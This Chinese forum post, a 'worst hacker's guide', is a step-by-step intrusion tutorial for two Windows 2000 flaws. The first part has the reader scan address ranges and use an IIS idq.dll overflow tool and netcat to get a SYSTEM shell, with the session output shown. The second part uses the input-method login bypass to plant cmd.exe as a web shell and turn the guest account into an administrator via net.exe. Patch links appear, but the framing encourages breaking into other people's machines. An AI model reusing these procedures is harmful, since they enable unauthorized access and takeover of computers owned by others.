网络最菜黑客指南 idq.dll缓冲区溢出漏洞 篇
[align=left]idq.dll缓冲区溢出漏洞描述: [/align][align=left]微软发布安全公告,指出其 Index Server 和 Indexing Service 存在漏洞。作为安装过程的一部分,IIS 安装了几个 ISAPI 扩展 .dlls 。其中的 idq.dll 存在问题,它是 Index Server 的一个组件,对管理员脚本(.ida文件)和 INTERNET 数据查询 (.idq文件)提供支持。
但是,idq.dll 在一段处理 URL 输入的代码中存在一个未经检查的缓冲区。攻击者利用此漏洞能导致受影响服务器产生缓冲区溢出,从而执行自己提供的代码。而更为严重的是,idq.dll 是以 SYSTEM 身份运行的,攻击者成功利用此漏洞后能取得系统管理员权限。
注意:
1、安装了Index Server 或 Index Services,但是没有安装 IIS 的系统无此漏洞
2、即使 Index Server/Indexing Service 没有开启,但是只要对 .idq 或 .ida 文件的脚本映射存在,攻击者也能利用此漏洞。
受影响平台:
Windows NT® 4.0
Windows® 2000
Windows XP beta
受影响版本:
Microsoft Index Server 2.0
Indexing Service in Windows 2000[/align][align=left] [/align][align=left]本次范例需要的系统及程序情况如下:[/align][align=left]操作系统:Windows98[/align][align=left]对方操作系统:Windows 2000[/align][align=left]程序(一):Snake IIS IDQ 溢出程序 V2.0 Build0016 GUI版本[/align][align=left]程序(二):RangeScan扫描器 v0.7[/align][align=left]程序(二):Netcat 1.10 for NT 版[/align][align=left]本机IP:127.0.0.1[/align][align=left]测试IP:127.0.0.15[/align][align=left]新程序说明:[/align][align=left]“Snake IIS IDQ 溢出程序”是著名程序“Snake代理跳板”的作者“snake”制作的。使用此程序能利用idq漏洞溢出一个管理员(system)shell。[/align][align=left]支持的操作系统 类型: ----
"IIS5 Chinese Win2k",
"IIS5 Chinese Win2k Sp1",
"IIS5 Chinese Win2k Sp2",
"IIS5 English Win2k",
"IIS5 English Win2k Sp1",
"IIS5 English Win2k Sp2",
"IIS5 Japanese Win2k",
"IIS5 Japanese Win2k Sp1",
"IIS5 Mexico Win2k",
"IIS5 Korea Win2k SP1",
"IIS5 Korea Win2k SP2", [/align][align=left]附:源代码及注解[/align][align=left]Netcat:简称“NC”,一个功能非常强大的程序。功能与telnet差不多,但比telnet强大。[/align][align=left]说明:[/align][align=left][v1.10]
想要连接到某处: nc [-options] hostname port[s] [ports] ...
绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
参数:
-e prog 程序重定向,一旦连接,就执行 [危险!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 帮助信息
-i secs 延时的间隔
-l 监听模式,用于入站连接
-n 指定数字的IP地址,不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 任意指定本地及远程端口
-s addr 本地源地址
-u UDP模式
-v 详细输出——用两个-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输出关掉——用于扫描时
其中端口号可以指定一个或者用lo-hi式的指定范围。 [/align][align=left]1、打开“RangeScan扫描器”:[/align][align=left]“RangeScan扫描器”使用方法:
(1)在“扫描IP地址范围”内填入要扫描的地址范围。
(2)在“扫描内容”内填入要扫描的CGI名称。分别是:“cnhack.ida”和“cnhack.idq”。
(3)点击“添加”按钮,将其添加到下面的内容列表里。
(4)点击“扫描”,开始扫描。[/align][align=left]过一会……[/align][align=left]得到一台主机:127.0.0.15(此主机为演示用的主机,并不存在。)[/align][align=left]Snake IIS IDQ 溢出程序分为GUI(图形)版本和命令行版本。[/align][align=left]我们使用的是GUI版本。[/align][align=left]2、设置“Snake IIS IDQ 溢出程序”:[/align][align=left]被攻击地址:[/align][align=left]IP:127.0.0.15[/align][align=left]Port:80[/align][align=left]溢出选项:[/align][align=left]选择“溢出后,在一个端口监听”[/align][align=left]监听端口:813[/align][align=left]要绑定的命令:cmd.exe /c dir c:\[/align][align=left]操作系统类型:IIS5 Chinese Win2k[/align][align=left]说明:IIS5 Chinese Win2k[/align][align=left]IIS5:IIS的版本。[/align][align=left]Chinese:操作系统为中文[/align][align=left]Win2k:操作系统为Windows2000[/align][align=left]3、点击“IDQ溢出”,完成。[/align][align=left]程序会提示“发送shellcode 到 127.0.0.15:80 OK”。[/align][align=left]4、进入MS-DOS方程。进入“nc”的目录。然后:nc --v 127.0.0.15 80[/align][align=left]D:\>nc -vv 127.0.0.15 813
127.0.0.15: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [127.0.0.15] 813 (?): connection refused
sent 0, rcvd 0: NOTSOCK
[/align][align=left]D:\>[/align][align=left]没有成功。[/align][align=left]选择“操作系统类型”:IIS5 Chinese Win2k Sp1[/align][align=left]说明:[/align][align=left]Sp1:sp1是微软的补丁名称。分别有sp1、sp2、sp3等。这里是指已经打了sp1补丁的主机。[/align][align=left]重复第3-4步。[/align][align=left]D:\>nc -vv 127.0.0.15 813
127.0.0.15: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [127.0.0.15] 813 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32> [/align][align=left]成功了![/align][align=left]现在,你获得system权限。如同在DOS下操作主机一样,控制它![/align][align=left]小铭:快帮它打上补丁吧:)[/align][align=left]解决方法: [/align][align=left]
方法一:[/align][align=left]下载补丁:
Windows NT 4.0:
微软下载:[url=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30833][color=#0000ff]http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30833[/color][/url]
CNNS下载:
中文版:[url=http://www.cnns.net/frankie/mirror/download/chsq300972i.exe][color=#0000ff]http://www.cnns.net/frankie/mirror/download/chsq300972i.exe[/color][/url]
英文版:[url=http://www.cnns.net/frankie/mirror/download/q300972i.exe][color=#0000ff]http://www.cnns.net/frankie/mirror/download/q300972i.exe[/color][/url]
Windows 2000 Professional, Server and Advanced Server:
微软下载:[url=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30800][color=#0000ff]http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30800[/color][/url]
CNNS下载:
中文版:[url=http://www.cnns.net/frankie/mirror/download/q300972_w2k_sp3_x86_cn.exe][color=#0000ff]http://www.cnns.net/frankie/mirr ... _w2k_sp3_x86_cn.exe[/color][/url]
英文版:[url=http://www.cnns.net/frankie/mirror/download/q300972_w2k_sp3_x86_en.exe][color=#0000ff]http://www.cnns.net/frankie/mirr ... _w2k_sp3_x86_en.exe[/color][/url]
Windows 2000 Datacenter Server:
此版本补丁和硬件相关,请用户和原始设备供应商联系。
Windows XP beta:
在下个 BETA 版本会得到解决。
方案二:删除对 .idq 和 .ida 的脚本映射。
注意:如果其它系统组件被增删,有可能导致该映射被重新自动安装。
[/align]
网络最菜黑客指南 Windows2000输入法漏洞 篇
[align=left][color=#000000]我们先来看看,cnns的公告:[/color][/align][align=left]微软Windows 2000系列登录验证机制漏洞 (MS,缺陷)涉及程序:
Windows 2000
描述:
微软Windows 2000系列登录验证机制漏洞
详细:
在登录界面将光标移至用户名输入框,按键盘上的Ctrl+Shift键,这时在缺省的安装状态下会出现输入法状态条,将鼠标移至输入法状态条点击鼠标右键,出现的对话框中选择帮助,选择操作指南或输入法入门(微软的拼音输入法和智能ABC没有这个选项),在出现的操作指南或输入法入门窗口中会出现几个按钮,关键是选项按钮。如果是未安装Service Pack 1或IE5.5的Windows2000系统,用鼠标左键点击选项按钮,在出现的对话框中选择主页,这时在已出现的帮助窗口的右侧会出现IE浏览器界面中的此页不可显示页面,其中有个检测网络设置的链接,点击它就会出现网络设置选项,你可以对网络设置甚至控制面板做任何修改。用鼠标左键点击选项按钮,在出现的对话框中选择Internet选项,你也可以对主页、连结,安全、高级选项等做任何修改。最为严重的是用鼠标右键点击选项按钮会出现一个对话框,选择跳至URL,这时会出现一个对话框,其中有一个跳至该URL输入框,在其中输入你想看到的路径比如C:\ 那么这时在已出现的帮助窗口的右侧会出现资源管理器C盘的界面显示,你这时已经是系统管理员权限可以对你看到的数据做任何的操作,这样你就绕过了Windows2000的登录验证机制!
如果安装了Service Pack 1或IE5.5的Windows2000系统,网络设置选项不可以执行,但Internet选项仍可执行。资源管理器界面仍可出现,通过路径输入,所有的文件夹中的文件和根目录下的文件都可看到但已不能直接对文件夹和文件进行操作,但我们仍可以用鼠标右键点击文件夹和文件选择进行删除,彻底删除(按着Shift键),重命名,和发送到软盘等操作甚至可以格式化磁盘!或者用鼠标右键点击空白处选择Web或缩略图察看方式,会对一些可以显示的文件造成泄密。还有我们还可以用鼠标右键点击资源管理器界面左上角的盘符或者任意文件夹或能看到任意的文件,在盘符和文件夹出现的对话框中选择共享,在单个文件出现的对话框中选择属性,你可以任意添加共享权限,比如Everyone,你可以选择完全控制选项,这样只要这台机器如果在网络你仍可以通过网络远程登录完全控制所有数据资料!就是说我们无论通过网络远程登录或者物理接近装有Windows2000系统的计算机,那么我们就可控制一切!
此漏洞存在于一切具有多种输入法的Windows2000系统中,经过这样不正常的操作,正常登录以后还会随机出现各种程序运行错误。暂时的解决方法为:控制面板中选择区域选项中的输入法区域选项,选中启用任务栏上指示器复选框,留下你最擅长的一种输入法其余的输入法全部删除,其中内码输入法一定要删除!因为下述方法对内码输入法无效,然后在任务栏上用鼠标左键点击输入法图标的笔型图标选择关闭输入法状态。
解决方案:
因为这些操作是通过调用输入法的帮助文件来进行的。您也可以通过删除或者重命名输入法的帮助文件来解决。Windows2000 帮助文件中输入法分别对应的是系统安装目录(例如:C:\WINNT)中help文件夹中:
WINIME.CHM 输入法操作指南
WINSP.CHM 双拼输入法帮助
WINZM.CHM 郑码输入法帮助
WINPY.CHM 全拼输入法帮助
WINGB.CHM 内码输入法帮助
对于其它的的微软以及第三方输入法,也可能存在问题,建议用户根据测试步骤中的介绍自行检查。
下载补丁:
微软于2000年9月29日发布了新的安全公告 MS00-069:
http://www.microsoft.com/technet/security/bulletin/MS00-069.asp
并提供了补丁程序下载地址,
简体中文Windows 2000 : [url=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=24631][color=#0000ff]http://www.microsoft.com/Downloads/Release.asp?ReleaseID=24631[/color][/url]
英文版Windows 2000 : [url=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=24627][color=#0000ff]http://www.microsoft.com/Downloads/Release.asp?ReleaseID=24627[/color][/url]
我们推荐使用Windows 2000系统的用户尽快下载并安装相应的补丁。
看完cnns的公告后,是不是觉得这个漏洞很恐怖?[/align][align=left]事实上也如此。[/align][align=left]接着,让我们来看看怎样利用此漏洞入侵。[/align][align=left] [/align][align=left]本次范例需要的系统及程序情况如下:[/align][align=left]操作系统:Windows98[/align][align=left]对方操作系统:Windows 2000[/align][align=left]程序(一):终端服务客户端[/align][align=left]程序(二):superscan 3.0 [/align][align=left]本机IP:127.0.0.1[/align][align=left]测试IP:127.0.0.14[/align][align=left]新程序说明:[/align][align=left]“终端服务客户端”是微软为管理员制作的一个远程管理软件。利用它可以远程管理服务器,操作如同在本地一样。(连接端口:3389)[/align][align=left] [/align][align=left]1、首先,我们打开superscan。[/align][align=left]设置:[/align][align=left]IP:(需要扫描的IP地址。)[/align][align=left]Start:127.0.0.1[/align][align=left]Stop:127.0.0.255[/align][align=left]Scan Type:(扫描类型设置。)
[/align][align=left]All ports from:3389|3389[/align][align=left]然后,点击“Start”,开始扫描。
[/align][align=left]2、点击“Prune”,把多余的主机删除。然后把剩下的主机的IP地址记下来。(假设,我们扫描到:127.0.0.14。)[/align][align=left]3、打开“终端服务客户端”,设置。[/align][align=left]服务器:127.0.0.14[/align][align=left]其他默认。[/align][align=left]点击“连接”,完成。[/align][align=left]4、过了一会,Windows2000的登陆界面就出来了。(如果发现是英文或繁体中文版,就放弃。)[/align][align=left]5、用CTRL+SHIFT快速切换输入法,切换至全拼,这时在登录界面左下角将出现输入法状态条(如果没有出现,请耐心等待,因为对方的数据流传输还有一个过程)。[/align][align=left]方法(一):[/align][align=left]1、在输入法状态条上按鼠标右键。选择“帮助” —— “输入法指南” —— “选项”。(如果发现“帮助”呈灰色,放弃,因为对方很可能发现并已经补上了这个漏洞。)[/align][align=left]2、按右键,选择“跳转到URL”,输入:c:\winnt\system32\cmd.exe
3、选择“保存到磁盘”。
4、选择目录:c:\inetpub\scripts\
5、打开IE,输入:[url=http://127.0.0.14/scripts/cmd.exe?/c+dir+c:][color=#0000ff]http://127.0.0.14/scripts/cmd.exe?/c+dir+c:[/color][/url]\ [/align][align=left]现在,我们制作了一个shell(cmd.exe)。(关于如何利用,请看“unicode漏洞”篇。)
方法(二):[/align][align=left]1、在输入法状态条上按鼠标右键。选择“帮助” —— “输入法指南” —— “选项”。(如果发现“帮助”呈灰色,放弃,因为对方很可能发现并已经补上了这个漏洞)[/align][align=left]2、按右键,选择“跳转到URL”,输入:c:\winnt\system32 (system32为系统目录,不同的主机,系统目录的位置也不同。)[/align][align=left]3、在该目录下找到“net.exe”,为“net.exe”创建一个快捷方式。[/align][align=left]4、右键点击该快捷方式,在“属性” —— “目标”—— c:\winnt\system32\net.exe 后面空一格,填入“user guest /active :yes”。[/align][align=left]5、点击“确定”。[/align][align=left]说明:这一步骤目的是,利用“net.exe”激活被禁止使用的guest账户。[/align][align=left]6、运行该快捷方式。(此时你不会看到运行状态,但guest用户已被激活。)[/align][align=left]7、重复第4-6步。(其中,在“属性” —— “目标”—— c:\winnt\system32\net.exe 后面空一格,填入“user guest 密码”。)[/align][align=left]说明:这一步骤目的是,利用“net.exe”激活guest账户的密码。[/align][align=left]8、重复第4-6步。(其中,在“属性” —— “目标”—— c:\winnt\system32\net.exe 后面空一格,填入“localgroup administrators guest /add“)[/align][align=left]说明:这一步骤目的是,利用“net.exe”将guest变成系统管理员。 [/align][align=left]9、再次登录终端服务器,以“guest”身份进入,此时guest已是系统管理员,已具备一切可执行权及一切操作权限。[/align][align=left]现在,我们可以像操作本地主机一样,控制对方系统。[/align][align=left]注意事项:[/align][align=left]1、在这过程中,如果对方管理员正在使用终端服务管理器,他将看到你所打开的进程id及你的IP和主机名。
2、终端服务器在验证你的身份的时候只留给了你一分钟的时间。在这一分钟内如果你不能完成上述操作,你只能再连接。
3、你所看到的图像与操作会有所延迟,这受网速的影响。
[/align][align=left]小铭友好提示:进入别人的机子后,在桌面新建一个笔记本,告诉他修补此漏洞。(说不定那个人还会请你吃一顿呢!)[/align] 网络最菜黑客指南 idq.dll缓冲区溢出漏洞 网络最菜黑客指南 idq.dll缓冲区溢出漏洞 网络最菜黑客指南 idq.dll缓冲区溢出漏洞 网络最菜黑客指南 idq.dll缓冲区溢出漏洞 网络最菜黑客指南 idq.dll缓冲区溢出漏洞
页:
[1]
